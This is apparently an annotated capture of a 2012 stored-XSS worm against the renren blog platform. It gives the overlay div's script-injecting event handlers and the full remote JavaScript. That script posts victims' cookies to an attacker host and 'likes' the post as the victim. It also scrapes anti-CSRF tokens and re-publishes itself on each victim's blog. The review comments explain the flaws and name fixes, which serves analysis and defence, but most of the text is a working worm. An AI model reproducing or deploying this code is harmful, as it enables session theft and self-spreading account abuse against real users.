[12.11.22]xss live-code

如上图，日志（post）正文 div 的内容如下。注意其中的 div 带有三个内联事件处理属性（onMouseOver / onclick / onmousemove），这正是被存储型 XSS 利用的部分:
<!-- Stored-XSS payload exactly as it sat in the post body. The image and the
     "I Love You" paragraph are decoys; the <div> further down is the active part. -->
<p>
<img thumbnail="http://fmn.rrimg.com/fmn058/20121121/1750/original_eyyN_312c000026da118f.jpg"
title="photo-media" src="http://fmn.rrimg.com/fmn058/20121121/1750/original_eyyN_312c000026da118f.jpg"
border="0" />
</p>
<p> I Love You , My Sweetheart</p>
<!-- Full-viewport overlay: height/width 100%, position:absolute at (0,0),
     z-index 10, so practically any pointer activity on the page fires one of
     the three handlers. Each handler does the same thing: create a <script>
     element pointing at the attacker-controlled host and append it to <head>,
     which loads the remote worm code in the victim's origin. The inline on*
     attributes and the positioning style were evidently not removed by the
     post filter; a practitioner's fix is an allow-list HTML sanitiser that
     strips every on* attribute (and absolute positioning) from user content. -->
<div style="height:100%;
width:100%;z-index:10;position:absolute; left:0px; top:0px;" id="Nietzsche"
onMouseOver = "var
script=document.createElement('SCRIPT');
script.setAttribute('type','text/javascript');
script.setAttribute('src','http://webyuming.com//xss-test/renren/test.js');
document.getElementsByTagName('head')[0].appendChild(script);"
onclick="var
script=document.createElement('SCRIPT');
script.setAttribute('type','text/javascript');
script.setAttribute('src','http://webyuming.com//xss-test/renren/test.js');
document.getElementsByTagName('head')[0].appendChild(script);"
onmousemove="var
script=document.createElement('SCRIPT');
script.setAttribute('type','text/javascript');
script.setAttribute('src','http://webyuming.com//xss-test/renren/test.js');
document.getElementsByTagName('head')[0].appendChild(script);">
<!-- Empty anchor giving the overlay some content. The data-mce-href attribute
     looks like a rich-text-editor artefact (presumably TinyMCE; not confirmed). -->
<a href="http://rrurl.cn/97w8nT" data-mce-href="http://rrurl.cn/97w8nT.cn/l/asg_video.asp"> </a>
</div>
被上面那段 HTML 注入到页面中的远程脚本 webyuming.com//xss-test/renren/test.js 的代码如下（在受害者的 renren 源下执行）:
/* some useful helper functions */
在页面中加入jquery。
// Inject an external <script src=path> into <head>.
// When `reload` is falsy, a script element whose src already equals `path`
// (compared case-insensitively) short-circuits the call and nothing is added.
// Note: the inserted script loads asynchronously; callers cannot assume the
// library is available on the next statement.
function include_js(path, reload) {
  if (!reload) {
    var existing = document.getElementsByTagName("script");
    var wanted = path.toLowerCase();
    for (var k = 0; k < existing.length; k++) {
      var src = existing[k].src;
      if (src && src.toLowerCase() == wanted) {
        return; // already on the page
      }
    }
  }
  var tag = document.createElement('script');
  tag.type = "text/javascript";
  tag.src = path;
  document.getElementsByTagName('head')[0].appendChild(tag);
}
加入jQuery
// Pull jQuery 1.8.2 from the public CDN; everything below relies on $.get/$.post.
// NOTE(review): include_js only schedules the load (dynamic <script> elements load
// asynchronously), so the synchronous calls at the bottom of this file can only
// work if the host page already provides `$` -- not confirmed from here.
include_js("http://code.jquery.com/jquery-1.8.2.min.js",0); //JQuery
设置cookie
// Write cookie `name`=`value` (escape()d) on the current document, expiring
// 30 days from now. Used as a per-victim "already done" marker by the steps below.
function setCookie(name, value) {
  var expiry = new Date();
  expiry.setTime(expiry.getTime() + 30 * 24 * 60 * 60 * 1000);
  document.cookie = name + "=" + escape(value) + ";expires=" + expiry.toGMTString();
}
//read cookies
读取cookie
// Read cookie `name` from document.cookie.
// Returns the unescape()d value, or null when no such cookie exists. The
// pattern is anchored to start-of-string or a preceding space, so "id=" does
// not match inside e.g. "uid=". `name` is interpolated into the RegExp
// unescaped, so it must not contain regex metacharacters.
function getCookie(name) {
  var pattern = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
  var found = document.cookie.match(pattern);
  return found ? unescape(found[2]) : null;
}
下面的函数返回要再次发布的“日志”正文——就是上面那段带内联事件处理属性的 HTML。它被 add_a_new_blog 用来在受害者账号下重新发布载荷，是蠕虫自我复制的部分。
function return_code()
{//return my code
// The self-replication payload: the same decoy image + text + full-page overlay
// div with the three script-injecting on* handlers shown at the top of this
// page. It is posted verbatim as the body of a new entry by add_a_new_blog.
// Only visible difference from the captured post: the trailing anchor points at
// www.baidu.com here instead of the rrurl.cn short link.
var my_code="<p><img thumbnail=\"http://fmn.rrimg.com/fmn058/20121121/1750/original_eyyN_312c000026da118f.jpg\" title=\"photo-media\" src=\"http://fmn.rrimg.com/fmn058/20121121/1750/original_eyyN_312c000026da118f.jpg\" border=\"0\" /></p><p> I Love You , My Sweetheart</p><div style=\"height:100%; width:100%;z-index:10;position:absolute; left:0px; top:0px;\" id=\"Nietzsche\" onMouseOver=\"var script=document.createElement(\'SCRIPT\');script.setAttribute(\'type\',\'text/javascript\');script.setAttribute(\'src\',\'http://webyuming.com//xss-test/renren/test.js\');document.getElementsByTagName(\'head\')[0].appendChild(script);\" onclick=\"var script=document.createElement(\'SCRIPT\');script.setAttribute(\'type\',\'text/javascript\');script.setAttribute(\'src\',\'http://webyuming.com//xss-test/renren/test.js\');document.getElementsByTagName(\'head\')[0].appendChild(script);\" onmousemove=\"var script=document.createElement(\'SCRIPT\');script.setAttribute(\'type\',\'text/javascript\');script.setAttribute(\'src\',\'http://webyuming.com//xss-test/renren/test.js\');document.getElementsByTagName(\'head\')[0].appendChild(script);\"><a href=\"http://www.baidu.com\" data-mce-href=\"http://www.baidu.com.cn/l/asg_video.asp\"> </a></div>";
return my_code;
}
///////////////////////////////////////////////////////////
清除div
// Remove the full-page overlay div (#Nietzsche) once the payload has run, so
// the hijacked page looks and behaves normally again. The removal is queued
// through jQuery's ready handler rather than done immediately.
function clear_code() {
  var removeOverlay = function () {
    $("#Nietzsche").remove("#Nietzsche");
  };
  $(removeOverlay);
}
获取uid
function get_now_blog_owner_id()
{
// Owner id = the path segment following "/blog/" in the current URL
// (e.g. http://blog.renren.com/blog/<owner>/<entry>).
var id = "";
var url = location.href;
var id_index = url.indexOf("\/blog\/") + 6; // skip "/blog/" (the \/ escapes are plain "/")
// NOTE(review): the "- 1" is an off-by-one. id_end lands one character before
// the next "/", so substr() returns the owner id minus its last character.
// get_now_blog_id compensates with a "+ 2"; do not change one without the other.
var id_end = url.indexOf("\/",id_index) - 1;
id = url.substr(id_index,id_end - id_index);
return id;
}
获取blog id
function get_now_blog_id()
{
// Entry id = the path segment after the owner id, up to "?" or end of URL.
var id = "";
var userid = get_now_blog_owner_id();
var url = location.href;
//alert(userid);
// "+ 2" skips the owner id's dropped last character plus the "/"; it only works
// because get_now_blog_owner_id returns the id one character short (original
// note: "because of the '/' so add two"). Also assumes the first occurrence of
// userid in the URL is that path segment.
var id_index = url.indexOf(userid) + userid.length + 2; //because of the '/' so add two
if(url.indexOf("?",id_index) > 0)
{//a "?" was found: the id ends there
var id_end = url.indexOf("?",id_index);
}
else
{//no "?": the id runs to the end of the URL
var id_end = url.length;
}
id = url.substr(id_index,id_end - id_index);
return id;
}
着手发日志的准备工作
//new-blog-token///////
// Title and body of the entry to be re-published; filled in by add_a_new_blog.
var title = "";
var comment = "";
// Globals the posting step depends on (original note: "important globals for posting").
// requestToken / rtk are the anti-CSRF values scraped from NewEntry.do by get_token_callback.
var requestToken = "";
var rtk = "";
// Owner id and entry id of the page currently being viewed, parsed from location.href.
// NOTE(review): now_blog_owner_id is one character short -- see get_now_blog_owner_id.
var now_blog_owner_id = get_now_blog_owner_id();
var now_blog_id = get_now_blog_id();
送cookie
function send_cookie()
{//send cookie to the server
// Runs once per victim: the JOSSION_DONE cookie is the "already done" marker.
if(getCookie("JOSSION_DONE") == "1")
{
// clear_code();
return;
}
// This is where the victim's cookies are handed to the attacker's host (original
// note). It is a cross-origin POST of document.cookie; only cookies without the
// HttpOnly flag are readable here, so marking the session cookie HttpOnly would
// blunt this step (though not the same-origin CSRF steps that follow).
$.post("http://webyuming.com/xss-test/renren/test.php",{cookie:document.cookie});
setCookie("JOSSION_DONE","1");
//clear_code();
return ;
}
还要点喜欢。。
function set_like()
{//set to like this blog
// Idempotence marker, same pattern as send_cookie.
if(getCookie("JOSSION_S_LIKE_DONE") == "1")
{
// clear_code();
return;
}
var gid = "blog_"+now_blog_id;
// The victim's own user id is read from the site's "id" cookie (so that cookie is not HttpOnly).
var uid = getCookie("id");
// NOTE(review): now_blog_owner_id is missing its last character (see
// get_now_blog_owner_id), so the owner sent here is truncated.
var owner = now_blog_owner_id;
// Hard-coded display name (original note: "something is wrong here").
// NOTE(review): unescape() decodes each %XX as a Latin-1 code unit, not as
// UTF-8, so this yields mojibake rather than the intended string; the captured
// requests below show the UTF-8 form, which decodeURIComponent would produce.
// That is a plausible cause of the "something wrong" the author noticed.
var name = unescape("%E9%A9%AC%E5%BD%A7"); //some thing wrong here tmd...
// `t` is a fixed value copied from a captured request (cf. the two URLs below);
// it looks like a Math.random() cache-buster rather than a per-request token.
var t = "0.19290689448826015";
// Same-origin GET that "likes" the post. The recorded URLs show no unpredictable
// per-request secret in the parameters, so this state change appears to be
// reachable by plain CSRF as well as by this XSS.
$.get("http://like.renren.com/addlike",{gid:gid,uid:uid,t:t,owner:owner,type:0,name:name});
//$.get("http://127.0.0.1/XSS/test.php",{gid:gid,uid:uid,t:t,owner:owner,type:0,name:name});
setCookie("JOSSION_S_LIKE_DONE","1"); //addlike?gid=blog_880089157&uid=488528531&t=0.19290689448826015&owner=406146278&type=0&name=%E9%A9%AC%E5%BD%A7
//addlike?gid=blog_880089157&uid=488528531&t=0.676470594946295&owner=406146278&type=0&name=%E9%A9%AC%E5%BD%A7
}
////////real_add_new_blog
发日志
function new_blog()
{//do not call this directly: get_token_callback calls it once the token has been found
// Idempotence marker, same pattern as send_cookie / set_like.
if(getCookie("JOSSION_S_BLOG_DONE") == "1")
{
// clear_code();
return;
}
var userid = getCookie("id");
var my_requestToken = requestToken;
// The self-propagation step (original note: "the posting code is here"): a
// same-origin POST that re-publishes the payload in `comment` under the
// victim's account, using the anti-CSRF values scraped from NewEntry.do.
//ADD A NEW BLOG
// NOTE(review): `bfrom:010203044` is a legacy octal literal in sloppy mode and is
// sent as 2164260, not 10203044. `requestToken` and `_rtk` appear twice in the
// literal (last one wins; harmless). `passwordProtedted` is kept as-is because it
// is presumably the server's real field name.
$.post("http://blog.renren.com/NewEntry.do",{title:title,body:comment,categoryId:0,blogControl:99,passwordProtedted:0,postFormId:my_requestToken,id:userid,relative_optype:"default",jf_vip_em:true,bfrom:010203044,requestToken:my_requestToken,_rtk:rtk,requestToken:my_requestToken,_rtk:rtk,needFeed:true,feedKind:"pic",feedSrc:"http://fmn.rrimg.com/fmn058/20121121/1750/original_eyyN_312c000026da118f.jpg"});
setCookie("JOSSION_S_BLOG_DONE","1"); //set cookie that prove blog has add
}
/////call back
“回调函数”：拿到 NewEntry.do 的响应 result 后被调用，从页面文本中提取 get_check / get_check_x 两个 token，然后调用 new_blog。
// jQuery callback for the GET of NewEntry.do. Scrapes the two anti-CSRF
// values out of the page text -- the substring between "get_check:'" and the
// next "'" goes into the global requestToken, the one after "get_check_x:'"
// into the global rtk -- and, if a requestToken was found, triggers new_blog().
// Caveat: when a marker is absent, indexOf() returns -1 and the offset
// arithmetic still runs; the result is whatever substr() yields from that
// position, so a non-empty garbage token can still trigger new_blog().
function get_token_callback(result) {
  var extract = function (marker) {
    var start = result.indexOf(marker) + marker.length;
    var stop = result.indexOf("'", start);
    return result.substr(start, stop - start);
  };
  requestToken = extract("get_check:'");
  rtk = extract("get_check_x:'");
  if (requestToken != "") {
    new_blog();
  }
  return;
}
封装好的发日志函数。
function add_a_new_blog(my_title,my_comment)
{
// Stash title/body in the globals that new_blog() reads later.
title = my_title;
comment = my_comment;
if(getCookie("JOSSION_S_BLOG_DONE") == "1")
{
// clear_code();
return;
}
var userid = getCookie("id"); // unused here; new_blog() re-reads the cookie itself
//ADD A NEW BLOG
// Send a GET to http://blog.renren.com/NewEntry.do and let the callback
// get_token_callback pull the token out of the response (original note).
// The token is embedded in an HTML page served same-origin, so script running
// in the victim's origin can read it: an anti-CSRF token is no defence once XSS
// is present, which is why the overlay's script injection is the root issue.
$.get("http://blog.renren.com/NewEntry.do",{},get_token_callback); //find token and add a new blog
}
//alert(return_code());
///////////////////////////////
//alert(document.cookie);
////////////////////////////////
/* main function */
// Sequence executed on every victim who triggers the overlay. NOTE(review): every
// step below uses `$`, but jQuery was only scheduled for loading by include_js
// above (dynamic <script> elements load asynchronously), so this can only work
// if the host page already exposes jQuery -- not confirmed from here.
clear_code(); // restore the hijacked page by removing the overlay div (original note)
// 1. exfiltrate document.cookie to the attacker's host
send_cookie();
// 2. "like" the current post as the victim
set_like();//set to like this blog
// 3. self-propagate: re-publish the payload as a new entry on the victim's account
add_a_new_blog("我爱你。亲爱的。。。",return_code()); //add a new blog